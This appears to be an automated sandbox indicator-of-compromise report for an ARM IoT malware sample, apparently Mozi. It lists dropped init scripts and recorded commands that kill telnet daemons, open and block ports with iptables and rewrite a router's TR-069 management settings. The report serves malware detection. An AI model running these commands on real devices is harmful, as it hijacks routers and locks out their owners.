IOCReport


Files

File Path
Type
Category
Malicious
nT7K5GG5km
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/bootmisc.sh
ASCII text
dropped
malicious
/etc/init.d/checkfs.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/checkroot.sh
ASCII text
dropped
malicious
/etc/init.d/hostname.sh
ASCII text
dropped
malicious
/etc/init.d/hwclock.sh
ASCII text
dropped
malicious
/etc/init.d/mountall-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountall.sh
ASCII text
dropped
malicious
/etc/init.d/mountdevsubfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountkernfs.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs-bootclean.sh
ASCII text
dropped
malicious
/etc/init.d/mountnfs.sh
ASCII text
dropped
malicious
/etc/init.d/umountnfs.sh
ASCII text
dropped
malicious
/etc/profile.d/Z97-byobu.sh
ASCII text
dropped
malicious
/etc/profile.d/apps-bin-path.sh
ASCII text
dropped
malicious
/etc/profile.d/bash_completion.sh
ASCII text
dropped
malicious
/etc/profile.d/cedilla-portuguese.sh
ASCII text
dropped
malicious
/etc/profile.d/vte-2.91.sh
ASCII text
dropped
malicious
/etc/rc.local
ASCII text
dropped
malicious
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
malicious
/usr/bin/gettext.sh
ASCII text
dropped
malicious
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
malicious
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
dropped
malicious
/boot/grub/i386-pc/modinfo.sh
ASCII text
dropped
clean
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
dropped
clean
/etc/acpi/asus-wireless.sh
ASCII text
dropped
clean
/etc/acpi/ibm-wireless.sh
ASCII text
dropped
clean
/etc/acpi/powerbtn.sh
ASCII text
dropped
clean
/etc/acpi/tosh-wireless.sh
ASCII text
dropped
clean
/etc/acpi/undock.sh
ASCII text
dropped
clean
/etc/bash_completion.d/libreoffice.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/action_wpa.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/functions.sh
ASCII text
dropped
clean
/etc/wpa_supplicant/ifupdown.sh
ASCII text
dropped
clean
/tmp/.config
ASCII text
dropped
clean
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
dropped
clean
/usr/share/alsa/utils.sh
ASCII text
dropped
clean
/usr/share/brltty/initramfs/brltty.sh
ASCII text
dropped
clean
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
dropped
clean
/usr/share/cups/braille/index.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv3.sh
ASCII text
dropped
clean
/usr/share/cups/braille/indexv4.sh
ASCII text
dropped
clean
/usr/share/debconf/confmodule.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/ac.sh
ASCII text
dropped
clean
/usr/share/doc/acpid/examples/default.sh
ASCII text
dropped
clean
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
dropped
clean
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
dropped
clean
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
dropped
clean
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
dropped
clean
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
dropped
clean
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
dropped
clean
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
dropped
clean
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
dropped
clean
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
dropped
clean
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
dropped
clean
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
dropped
clean
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
dropped
clean
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
dropped
clean
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
dropped
clean
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
dropped
clean
/usr/share/hplip/hplip_clean.sh
ASCII text
dropped
clean
/usr/share/keyutils/request-key-debug.sh
ASCII text
dropped
clean
/usr/share/lightdm/guest-session/setup.sh
ASCII text
dropped
clean
/usr/share/os-prober/common.sh
ASCII text
dropped
clean
/usr/share/vim/vim74/macros/less.sh
ASCII text
dropped
clean
/usr/share/xscreensaver/xscreensaver-wrapper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh
C source, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/tags.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh
awk or perl script, ASCII text, with very long lines
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh
awk or perl script, ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh
ASCII text
dropped
clean
/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
ASCII text
dropped
clean
/var/crash/_usr_share_apport_apport-gtk.1000.crash
ASCII text
dropped
clean

Processes

Path
Cmdline
Malicious
/tmp/nT7K5GG5km
/usr/bin/qemu-arm /tmp/nT7K5GG5km
clean
/tmp/nT7K5GG5km
n/a
clean
/tmp/nT7K5GG5km
n/a
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
clean
/bin/sh
n/a
clean
/usr/bin/killall
killall -9 telnetd utelnetd scfgmgr
clean
/tmp/nT7K5GG5km
n/a
clean
/tmp/nT7K5GG5km
n/a
clean
/tmp/nT7K5GG5km
n/a
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 44040 -j ACCEPT
clean
/sbin/iptables
n/a
clean
/sbin/modprobe
/sbin/modprobe ip_tables
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 44040 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --destination-port 44040 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --source-port 44040 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 44040 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 44040 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 44040 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --dport 44040 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --sport 44040 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/tmp/nT7K5GG5km
n/a
clean
/tmp/nT7K5GG5km
n/a
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 58000 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 35000 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 50023 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 7547 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --destination-port 8080 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --source-port 8080 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --destination-port 8080 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --source-port 8080 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --dport 8080 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I INPUT -p udp --dport 8080 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I OUTPUT -p udp --sport 8080 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --dport 8080 -j ACCEPT
clean
/tmp/nT7K5GG5km
n/a
clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT"
clean
/bin/sh
n/a
clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --sport 8080 -j ACCEPT
clean
/sbin/upstart
n/a
clean
/bin/sh
